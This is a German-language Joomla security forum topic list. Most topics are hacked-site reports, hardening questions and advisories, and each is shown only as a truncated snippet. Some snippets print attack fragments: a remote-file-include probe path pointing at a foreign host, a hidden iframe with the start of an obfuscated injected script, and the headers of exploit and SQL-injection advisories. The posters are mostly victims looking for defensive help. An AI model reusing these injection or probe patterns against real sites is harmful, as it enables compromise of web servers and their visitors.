Hinweise und Diskussionen rund um die Sicherheit von Joomla.
Hinweise und Diskussionen rund um die Sicherheit von 3rd-Party Applikationen.
FacileForms und Referrer
25.05.2009, 15:30
Wichtige Sicherheitsinformationen gibt es im offiziellen, englischsprachigen Forum. Dort existieren folgende Rubriken: Security: Sicherheitsfragen zu Joomla selbst und der Absicherung des Servers 3rd Party/Non Joomla! Security Issues: Sicherheitsfragen außerhalb des Joomla-Core, insbesondere...
analytics-google.info ist nicht von Google! Die Seite wird hier bereits als Malware gelistet: http://www.malwaredomainlist.com/mdl.php?search=analytics-google.info Es wird Code in die index.php vom Template eingeschleust der auf den ersten Blick wie der Tracking Code von Google Analytics...
Wer das SMF http://www.simplemachines.org/ noch nuzt... der schaut mal hier rein http://forum.easy-joomla.org/index.php/topic,540.msg1604/topicseen.html#new Kurz... Anhänge deaktivieren vorerst http://secunia.com/Advisories/32516/ http://milw0rm.com/exploits/6993
Joomla Flash Uploader Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2 = http://download.joomlaportal.ch/content/view/1060/ = ============================================ = = Exploit: =...
Aufruf zum Sammeln welche Extensionen NICHT unter Register Globals emulation=OFF .... zu finden in {joomla_DIR}/globals.php funktionieren /** * Use 1 to emulate register_globals = on * * Use 0 to emulate regsiter_globals = off */ define( 'RG_EMULATION', 1 ); Damit hier auch gleich...
Dies ist eine (freie, damit hoffentlich verständlichere) Übersetzung der Joomla! Sicherheits Checkliste (http://forum.joomla.org/index.php/topic,81058.0.html). Wir haben uns bemüht, die Übersetzung so zu gestalten, dass Sie jederzeit leicht entsprechend des englischsprachigen Threads aktualisiert...
Hallo, ich habe wiedermal ein Backup gemacht (mit FileZilla) (zuvor hab ich mir die neue FileZilla Version) runtergeladen. Als Antivirus verwende ich den Avira Antivir Ver. 8. Seit dem letzten Backup habe ich sowohl den Antivirus von der Ver. 7 auf 8 upgedatet, und den FileZilla auch. Wie...
Hallo, in letzter Zeit finde ich häufig Aufrufe auf meinen Seiten mit dem Pfad ...components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.... (irgendeine mysteriöse Adresse die nicht zu meinen Seiten gehört) Dazu finde ich allerdings nirgends was (ausser Logfiles von...
Hallo liebe Community, habe folgendes Problem: möchte einen Skript verwenden, der die php.ini automatisch in alle Verzeichnisse kopiert. hier ist er <?php // set this value to Y if you only want to overwrite old php.ini files // set this value to N if you want to put a php.ini file in...
high ich habe ein Problem mit den register_globals einstellungen besser gesagt mit dem was mir Joomla darüber ausgibt. ich habe bei meinen ISP (Revido) nachgefragt und mir wurde erklärt das es kein problem ist dieses abzuänderen gegen ein geringes entgeld , gesagt getan... nun das eigentliche...
Hallo, ich wollte mal fragen wie sicher das Modul SQL-Dumper ist und ob man sich darauf verlassen kann?
Hallo! Ich möchte eine Joomla Seite auf ein Business-Server von Strato installieren, nun würde ich gerne wissen, ob jemand damit schon Erfahrung gemacht hat, und welche Rechte die einzelnen Ordner/Dateien erhalten sollten, damit sie einigermaßen geschützt sind? Hatte mal irgendwo hier gelesen,...
Ich habe auf einer meiner Seiten 1.0.12 am laufen. Ich möchte aber wegen der tiefgreifenden Änderungen am Loginsystem und den damit verbundenen Schwierigkeiten nicht upgraden. Gibts eine Übersicht von den kritischen Änderungen, die zwischen 1.0.12 und 1.0.15 gemacht wurden? Dann würde ich die...
Hallo, ich will hier keine Disskusion los treten wegen Sicherheitslücken jedoch scheint es meine Seite erwischht zu haben. Ich habe Joomla 1.0.15 installiert und nur die Notwenigensten Rechte zugriffsrechte vergeben. Wenn ich meine Domain aufrufe scheint es so als wenn meine Seite geladen...
Es gibt ja eine Menge Module und Plugins mit deren Hilfe man Code im Content oder auf einer Modulposition ausführen kann. Es ist sicher jedoch am besten, wenn man das meiste mit dem reinen Joomla-Core realisieren kann. Da die direkte Codeeinpflege durch den WYSIWYG-Editor nicht möglich ist, besteht...
Hi, alle Mitglieder haben folgende PN erhalten: Ich nutzte Joomla 1.0.15, CB 1.1. und Uddeim 1.0. Der Fake Benutzer wurde erstmal gesperrt. Wie kann ich die IP des Nutzers sehen? Hilfe!!! :shock: Was tun?!
Hi Ich habe festgestellt, dass in meiner Komponente YNews eine Sicherheitslücke festgestellt wurde. Die meldung ist: ########################################################################################### ### entfernt vorsichtshalber...
Hi, ich komme hier irgendwie nicht weiter. Ich verwende momentan die REMOSITORY Komponente im Login-Bereich und würde gerne diesen Login-Bereich durch SSL schützen. Ich scheitere daran daß ich nicht weiss wie ich teile meiner Joomla Installation (eben nur den Login-Bereich) über SSL laufen lassen...
Nach einem Hackerangriff wurde in den Joomladaten auf dem Server Trojaner wie "BackDoor-DNF" hinterlassen. Dies bemerkte ich, als ich das mit "joomlapack" erstellte Backupfile auf meine Festplatte runterladen wollte und dies mein Virenscanner nicht zuliess. Die betroffene Datei habe ich nun...
Auf Bugtraq fand ich folgenden Eintrag (erstellt: 09.04.2008 11:20 Uhr von netmantis.com@gmail.com): ###Beginn### I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) . SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for...
Hallo, hat jemand Erfahrungen mit einem Joomla und php-ids? Bevor ich jetzt mein Webspace nochmal sicher und anfange das zu installieren würde ich gerne wissen ob jemand schonmal versucht hat das in eine Joomlaseite zu integrieren und ob es schwere Probleme/Fehler verursachte. Hier ein Link...
Hallo, ich habe gerade etwas herausgefunden. Wenn man einen Menüpunkt nur für Registered sichtbar macht kann man trotzdem drauf zugreifen nämlich... zB habe ich einen Menüpunkt mit der Itemid=28 versteckt und nur für Registered sichtbar gemacht. Wenn man jetzt die Itemid im Link auf zB 30...
Guten Abend zusammen: ich habe heute entdeckt, dass meine Index-Datei im Joomla Root modifiziert wurde. Und zwar wurde folgender Code am Ende angehängt: <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4803c853d1c55(v4803c853d1d12){ function...
Hi ! Ich hätte mal eine Frage, ich will auf meiner Seite einen Kalender einbauen, will diesen aber nur 2 speziellen Usern sichbar machen. Man kann ja aber beim Access Level leider nur public, reg. oder spezial anklicken und keine einzelnen Usernamen hab ich da was übersehen oder geht das...
Hallo Leute, In der oben angezeigten Zeit ist die Website www.sc-forst.de angegriffen worden. In der configuration.php wurde ein "iframe" Tag gesetzt. Zur Zeit des Angriffs war die Vers. 1.0.12 im Einsatz. Nach Entfernung des "iframe " Tags aus der config.php und eines Updates auf V.1.0.15 lief...
Hallo zusammen - ich habe ein Riesenproblem - 1&1 (hostet meine Webseite) schreibt: wir mussten einen über Ihre Präsenz ausgeführten Angriff auf unseren Webserver registrieren. Ausgangspunkt waren Ihre PHP-Scripte, welche anscheinend das Hochladen beliebiger Scripte erlauben. Bitte...
Hallo Joomla gemeinde! Gestern nacht oder heute früh war, so wie es aussieht irgendwer auf meinen webseiten und hat einige änderungen gemacht. Auf beiden hab ich joomla 1.0.13 installiert. Auf der ersten Seite hat derjenige content veröffentlicht (der schon exisierte abeer auf unpulished gestellt...
Hallo Leute, mir ward so, als hätt ich vor geraumer Zeit ein Script hier zum runterladen gesehen, welches alle Verzeichnisse mit einer leeren index.html bespielt. Hab jetzt nach diversen Suchwörtern gesucht, aber nix gefunden.. Kann mir jemand nen hint geben wonach ich suchen soll??? ...
Wenn ich auf meine Seite http://www.tierralinda.de zugreife, dann kommt im Internet Explorer 7 die Meldung "die Website möchte auf folgendes Add-on zugreifen: "MSXML 5.0" von "Microsoft ..." ... wollen sie vertrauen blah und die Ausführung zulassen." Kann mir das jemand erklären? Findet jemand...
Guten Morgen liebe Community, so nun wurde ich gehackt...Ja ich weiß, dass Forum durchsuchen und alles Sicher etc ;)...das habe ich alles gemacht. Es stand da: hacked by ecuador usw. nur ich weiß echt nicht, worüber die reingekommen sind. Ich hatte Register globals off und die...
Hallo, ich besitze einen V-Server und habe ihn eigentlich nach bestem Wissen und Gewissen abgesichert. Es laufen verschieden Domains drauf. Auf einer läuft: Joomla .14, virtuemart .14 Nun wurde in httpdocs / administrator / components / com_sections / / .. / sistem .... diverse...
Soooo auch von meinem Kunden wurde eine Webseite gehackt. Eigentlich muss ich fast schon sagen selber schuld. Joomla war 1.0.12 und Virtuemart auch auf diesem Stand. Ich hatte ihn schon mehrfach darauf hingewiesen daß das gemacht werden müsste. Es wurde aber immer wieder herausgezögert. ...
Hallo, mein 1blu server wurde am Sonntag von jemanden "aufgebrochen" viele html und php Dateien wurden mit folgendem Inhalt überschrieben: **hackerwerbung entfernt** ----------------------------- hatte joomla 12 installiert. und ein paar Komponetenn wie zb. googlemaps und fckeditor Die...
Hallo, ich hab nun schon einiges auf meiner Homepage gemacht und schon etliche Datein hochgeladen.Nun hab ich ein bischen angst ,das durch irgendeinen dummen Zufall ,oder durch irgendwem der spaß dran hat ,die ganze Arbeit umsonst war. Ich weiß wie schnell man durch ein paar Klicks alles...
Hallo Leute, Nach jetzt mitlerweile 2 stunden lesen hier im Forum komme ich irgendwie nicht auf einen Lösungsansatz. Folgendes Problem ist aufgetreten auf meiner Seite. Wenn ich mich im Backend anmelden möchte erscheint kurz der Login und nach ca 1s werde ich weiter geleitet auf eine .cn...
Nur Themen anzeigen, die im ausgewählten Zeitraum erstellt wurden.
Geben Sie an, wonach die Themenliste sortiert sein soll.
Reihenfolge
Hinweis: Wenn nach dem Datum sortiert wird, werden bei 'absteigender Reihenfolge' die neuesten Elemente zuerst angezeigt.
Foren-Regeln
